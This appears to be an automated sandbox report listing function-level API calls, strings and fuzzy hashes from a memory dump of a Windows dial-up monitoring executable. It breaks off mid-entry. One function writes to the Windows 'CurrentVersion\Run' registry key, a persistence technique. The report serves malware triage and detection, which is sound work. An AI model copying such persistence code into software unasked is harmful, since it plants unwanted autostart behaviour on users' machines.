Opcode ID: a35104533948777dbe97ff20b436dabc93305077d02c15f5c7c4d2e48e428457
Instruction ID: c5eba65a010185f09efca9168a2d42c0ef86bdb3c919f97faf8019ec74a5fc43
Opcode Fuzzy Hash: a35104533948777dbe97ff20b436dabc93305077d02c15f5c7c4d2e48e428457
Instruction Fuzzy Hash: 7DF09C35541B155BC6312B616C09AAA3751AF017F2F10427AFD45962A1DB64C8C24B5E

Function 00444775 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 0044478F
GetSystemMetrics.USER32(00000021), ref: 004447A8
GetSystemMetrics.USER32(00000005), ref: 004447BC
InflateRect.USER32(?,00000000), ref: 004447C3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 03bf86c19e7e810bdfa89ef3e65589251a88049d9d7443aa84e6b6fb771437c1
Instruction ID: 6342d0b2bb84c86f59198ab982cd8612eb9c7ca3fdf96e8ac6dce1bb6660da9d
Opcode Fuzzy Hash: 03bf86c19e7e810bdfa89ef3e65589251a88049d9d7443aa84e6b6fb771437c1
Instruction Fuzzy Hash: 7CF0C271540718BFF7105FD09C09BAA3F98EB41722F44C026FA086A1E1C7B4A912CB9D

Function 0044AD64 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(00000000,?,?,0044B271,00000000,00000001), ref: 0044AD70
GlobalHandle.KERNEL32(006B4C58), ref: 0044AD98
GlobalUnlock.KERNEL32(00000000,?,?,0044B271,00000000,00000001), ref: 0044ADA1
GlobalFree.KERNEL32(00000000), ref: 0044ADA8
DeleteCriticalSection.KERNEL32(0046D370,?,?,0044B271,00000000,00000001), ref: 0044ADB2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: 272c3e4ec1d41f02f4f594922b577e0379e5f9403ce8f622bde33e9cc23b08f3
Instruction ID: dd14f99f1631747faa5cc20f5387bb2d95a859e42e6551ee07b69e37e8f837ef
Opcode Fuzzy Hash: 272c3e4ec1d41f02f4f594922b577e0379e5f9403ce8f622bde33e9cc23b08f3
Instruction Fuzzy Hash: C5F0BE31600B105BE7209F38AC0CA3BB3AE9F8066271A452AF815D3262DB78DC018B69

Function 0045030C Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 0045031A
GetStockObject.GDI32(0000000D), ref: 00450327
SelectObject.GDI32(00000000,00000000), ref: 00450337
SaveDC.GDI32(00000000), ref: 0045033C
SelectObject.GDI32(00000000,?), ref: 00450349

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Object$SaveSelect$Stock
String ID:
API String ID: 2785865535-0
Opcode ID: 66d18c7da98a64d8153c322bf512478786cc438b3ba01d3262063d7ffa572e0c
Instruction ID: 6d4d585e7f6339cf5417d4fdcbd49a434a9e91cf75cbe3266df30202e6c62f65
Opcode Fuzzy Hash: 66d18c7da98a64d8153c322bf512478786cc438b3ba01d3262063d7ffa572e0c
Instruction Fuzzy Hash: 67F05831200B04AFDB202F66DD14A27BBE5EB44712B00453EE54A82921CB72FC08DF64

Function 0043D021 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 302COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0043D0C9
GetWindowRect.USER32(?,?), ref: 0043D271
SetRectEmpty.USER32(?), ref: 0043D2E2

Strings

@, xrefs: 0043D136

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: 7c796abb32d43cd74be832ab4b0e547531d292882e97829b289de8a7ffb8bc9f
Instruction ID: 7d908044e8acf85fb85fa4ee8be994adc6a97239ff4e941c899274521bc8f28e
Opcode Fuzzy Hash: 7c796abb32d43cd74be832ab4b0e547531d292882e97829b289de8a7ffb8bc9f
Instruction Fuzzy Hash: 09C14571E00219AFDF15CFA9D884AEEBBB4FF48314F04806AE815A7351DB389D01CB64

Function 0040FA50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042F3DC: lstrlenA.KERNEL32(00000100,00000000,00000100,00433FA2,?,?,?,00000100,?,?), ref: 0042F3ED

GetLocalTime.KERNEL32(?,?), ref: 0040FB18
GetLocalTime.KERNEL32(?,?), ref: 0040FB3E

Strings

\Ras Total\Bytes Received, xrefs: 0040FA9D
\Ras Total\Bytes Transmitted, xrefs: 0040FAB0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: LocalTime$lstrlen
String ID: \Ras Total\Bytes Received$\Ras Total\Bytes Transmitted
API String ID: 3296611475-822303990
Opcode ID: 5c0b76d4bec1055b32b3b5fe350fcbc251b015eac3f0ef6df394353f6958f282
Instruction ID: 449c380c00d6efe1343dcda9c7c2d05c51108df7fca26f5c5a94c0e8da4141bb
Opcode Fuzzy Hash: 5c0b76d4bec1055b32b3b5fe350fcbc251b015eac3f0ef6df394353f6958f282
Instruction Fuzzy Hash: 4C416CB0600B04DFC724CF5AC550A5AFBF8FF98704F508A6EE44A87B91D7B8A509CB95

Function 004095A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F1), ref: 004095D1
LoadResource.KERNEL32(?,00000000,?,753C3EB0,?,?,00000800,50402834,?,?,?,0000E800), ref: 004095E6

Strings

4(@P, xrefs: 004095AD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Resource$FindLoad
String ID: 4(@P
API String ID: 2619053042-4081170755
Opcode ID: 11fe725797abea43dfaac36f4123b40479188361c251800135aaaf0317ad541e
Instruction ID: ce028c0087d8b6016d6cb2876214a5704d7962dfe0f8b54ada48ae5739f875b2
Opcode Fuzzy Hash: 11fe725797abea43dfaac36f4123b40479188361c251800135aaaf0317ad541e
Instruction Fuzzy Hash: 0A319C75208702ABD314EF658880A6BB2E4EB88710F404D3EF46AE7681E7399C458B69

Function 00434AE3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00434AFF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00434B52
GlobalUnlock.KERNEL32(?), ref: 00434BE9

Strings

@, xrefs: 00434B3C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide
String ID: @
API String ID: 231414890-2766056989
Opcode ID: 77620d4681e831a2bf661b4b25ea3f38e8e87dcf00b2da973a3f4f5f6e2c08ee
Instruction ID: 492c6f5c6ae04c83d6d4cc6f8b66e85a57e648085002355039424d3c1d59d23b
Opcode Fuzzy Hash: 77620d4681e831a2bf661b4b25ea3f38e8e87dcf00b2da973a3f4f5f6e2c08ee
Instruction Fuzzy Hash: 1041D971800215EFCB14DF94C841AFEBBB4FF44754F14816AE819AB244D778FA46CB58

Function 0040AC90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 0040ACC7
InflateRect.USER32(?,000000FE,000000FE), ref: 0040ACD6
CreateFontIndirectA.GDI32(?), ref: 0040AD5A

Part of subcall function 004384E7: SetBkMode.GDI32(?,?), ref: 00438500
Part of subcall function 004384E7: SetBkMode.GDI32(?,?), ref: 0043850E

Strings

Marlett, xrefs: 0040ACF8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ModeRect$CopyCreateFontIndirectInflate
String ID: Marlett
API String ID: 2096747356-3688754224
Opcode ID: 039983a864a1cace1a65ea61d630fca4236bde937a7a55f4964b762963fc2991
Instruction ID: c74d00cfed416dc26dcca316b5915c6498f9fc32b63bd9bb9df75d2142717f58
Opcode Fuzzy Hash: 039983a864a1cace1a65ea61d630fca4236bde937a7a55f4964b762963fc2991
Instruction Fuzzy Hash: 0B417172608380AFC714CF69C890A5FFBE5BBD8724F544A1EF59683291CB74D908CB96

Function 00429C30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97stringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000010), ref: 00429C61
lstrcmpA.KERNEL32(0045D018,?), ref: 00429C7A

Strings

Unknown exception, xrefs: 00429C88

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: Unknown exception
API String ID: 3770760073-410509341
Opcode ID: 2fa99985d30775b74e7986c799a7031816d1525dfedf24e06854a3c7499fc0b1
Instruction ID: 7c112c67d8e990b55677d212d266ac5b403a879b4844fd2758974204ea144a40
Opcode Fuzzy Hash: 2fa99985d30775b74e7986c799a7031816d1525dfedf24e06854a3c7499fc0b1
Instruction Fuzzy Hash: 2F213572B002285FA710AF58FC84CFB339CEA85361F84057BED05C2251F62B990982AA

Function 0040E380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E3E9
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,00000001,?,?,00000000,?,753D4A40), ref: 0040E462
RegCloseKey.ADVAPI32(?), ref: 0040E479

Strings

Software\Josefsson\Dial-up watch\, xrefs: 0040E39E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseCreateValue
String ID: Software\Josefsson\Dial-up watch\
API String ID: 1818849710-374613065
Opcode ID: 6d1949987e788f72cc45626ad72c1f72ae3ec59904b5164ee28047fa8945fe98
Instruction ID: 87e52a75a7df9ecd98feb37ad19ce3026828ae2bf7805ed12963abe437b88dc1
Opcode Fuzzy Hash: 6d1949987e788f72cc45626ad72c1f72ae3ec59904b5164ee28047fa8945fe98
Instruction Fuzzy Hash: 27311A752083449FC324DB64D845BEBB7E8EBD4314F804A3DF689432D2DB746508C76A

Function 0041BB23 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0046EEE8), ref: 0041BB48
InterlockedDecrement.KERNEL32(0046EEE8), ref: 0041BB5D
InterlockedDecrement.KERNEL32(0046EEE8), ref: 0041BC00

Strings

F, xrefs: 0041BB3F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Interlocked$Decrement$Increment
String ID: F
API String ID: 2574743344-3850746006
Opcode ID: 511af0378756962c287edd67d1b406a36628358eff2f6a816ee7e124fa869eee
Instruction ID: 4eaf617d7efdc1ed30c83cb6886a36fface2d92fd070c7f0f5cd4569a7e1f454
Opcode Fuzzy Hash: 511af0378756962c287edd67d1b406a36628358eff2f6a816ee7e124fa869eee
Instruction Fuzzy Hash: 8531BE30508249EFDB21DF14D881BEA3BB0EB15398F14006BFC854AA55D778E9D2CBD9

Function 0040E120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E18E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?), ref: 0040E1D2
RegCloseKey.ADVAPI32(?), ref: 0040E1F3

Strings

Software\Josefsson\Dial-up watch\, xrefs: 0040E143

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseCreateQueryValue
String ID: Software\Josefsson\Dial-up watch\
API String ID: 4083198587-374613065
Opcode ID: 10db0699cb073ee65770c267009bf50df89b9d9f44ded71e7465f6d9897b799c
Instruction ID: 1df0cd90653c7cfea78a78e3fb4338adf016baa1377765e8027aa9520124f563
Opcode Fuzzy Hash: 10db0699cb073ee65770c267009bf50df89b9d9f44ded71e7465f6d9897b799c
Instruction Fuzzy Hash: EB3183B42083819ED324DF54D451BAFB7E8EBD4708F80492DF68543282DB78A50CCB6B

Function 0040A600 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,753C3EB0,?,?,00000800,50402834,?,?,?,0000E800), ref: 0040A631
LoadBitmapA.USER32(?,?), ref: 0040A688
ImageList_AddMasked.COMCTL32(?,?,00000000,?,753C3EB0,?,?,00000800,50402834,?,?,?,0000E800), ref: 0040A6C0

Strings

eE, xrefs: 0040A657

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ImageList_$BitmapIconLoadMaskedReplace
String ID: eE
API String ID: 2466485146-4195204705
Opcode ID: e262befe0c6a1a905cb1b71c5a4f49875b712c9f9cff8566cdbb78ddf42684e6
Instruction ID: ff596c6e49afc660e7985f145d7cc05cb927895e510bda1a31c1fba27ce4c1bd
Opcode Fuzzy Hash: e262befe0c6a1a905cb1b71c5a4f49875b712c9f9cff8566cdbb78ddf42684e6
Instruction Fuzzy Hash: E9319E71208701ABD304DF18D845B2BBBE4BF94B14F048A2EF88997391CB3CD809CB66

Function 00448C20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 00448C2C
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00448CDB
LoadBitmapA.USER32(00000000,00007FE3), ref: 00448CF3

Strings

, xrefs: 00448C3B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 7362f7ffc0c73c1c9d62198830ba9deaf70d4a4ebd8becbcecda0c6662738f43
Instruction ID: feb60dfbabbfe35f40d520dfb841a7b13917a952cba324ec8c3a1088d0527da0
Opcode Fuzzy Hash: 7362f7ffc0c73c1c9d62198830ba9deaf70d4a4ebd8becbcecda0c6662738f43
Instruction Fuzzy Hash: DE216A71E00315AFEB10CB78DCC5BBE7BB8EB44305F01417AE905EB282DB749A048B94

Function 00403FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 0040402D
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,00000001,?,?,00000000,00000000,?), ref: 004040A9
RegCloseKey.ADVAPI32(00000000), ref: 004040B4

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040401B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseCreateValue
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1818849710-1428018034
Opcode ID: 7a44071daf663b02ca5273e025b4f85d3fe712221940afc1af5051e1a3d31b7f
Instruction ID: 19f8b154b0258bf84d6389f160104cd54a537443b72f56b986d7b1c35bfc9213
Opcode Fuzzy Hash: 7a44071daf663b02ca5273e025b4f85d3fe712221940afc1af5051e1a3d31b7f
Instruction Fuzzy Hash: FB21C4B1204740ABD324DB24C855BABB7E5FBC4714F404A3DF755932D1DB786809CB6A

Function 0040E280 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E2DD
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?), ref: 0040E317
RegCloseKey.ADVAPI32(?), ref: 0040E32E

Strings

Software\Josefsson\Dial-up watch\, xrefs: 0040E29B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseCreateQueryValue
String ID: Software\Josefsson\Dial-up watch\
API String ID: 4083198587-374613065
Opcode ID: a756242dcad980e0a7d17698fd1e3e8f60ab06ab46df4dfde9bc071666e42287
Instruction ID: 21e907512f89e073802a81f160818c7632d19bc58b18c49ceba6594bfa16a16f
Opcode Fuzzy Hash: a756242dcad980e0a7d17698fd1e3e8f60ab06ab46df4dfde9bc071666e42287
Instruction Fuzzy Hash: 54216074108341EFD304DF65C895A6BBBE8FB98718F804A2EF49952291D738D908CB27

Function 0042740A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042740F

Part of subcall function 0041AA2B: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0041AB45,00000000), ref: 0041AA59

Strings

ios::failbit set, xrefs: 00427446
ios::eofbit set, xrefs: 0042744D, 00427461, 00427469
ios::badbit set, xrefs: 0042743C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
